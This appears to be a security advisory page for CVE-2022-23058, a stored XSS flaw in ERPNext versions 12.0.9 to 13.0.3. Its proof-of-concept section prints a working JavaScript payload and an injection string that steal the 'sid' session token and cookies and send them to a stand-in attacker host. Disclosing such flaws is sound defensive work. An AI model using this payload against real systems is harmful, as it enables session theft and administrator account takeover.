Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23058: Mend Vulnerability Database

ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to full account takeover.

CVE
#xss#vulnerability#js#java#perl

Overview

In ERPNext, versions v12.0.9-v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.

Details

ERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’.
These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the JavaScript payload is stored on the server, the victim would not be able to browse through the platform.

PoC Details

1. Login to the application with low privileged user
2. Go to the settings option in the navigation bar and select my Settings.
3. Provide the malicious script in the ‘username’ field and click save. (from the PoC code)
4. Create a file named ‘test1.js’ and run an HTTP server (like python simple http server)

the content of the ‘test1.js’ file:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(‘:’);
getSID = getSID[1].match(te);
console.log(getSID);
url = 'http://[attacker-ip]:[attacker-port]/?sid=’+getSID;
var script = document.createElement(‘script’);
script.src = url+"&details= " + document.cookie;
document.getElementsByTagName(‘head’)[0].appendChild(script);

5. open a tab in Incognito and go to the ERPNext server and login with a high privileged user , it will be redirected to the malicious page.
6. After a successful login, the ‘sid’ parameter will be sent to the Attacker which can then use it to login as Administrator

PoC Code

<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3

Prevention

Upgrade to ERPNext version 13.1.0

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907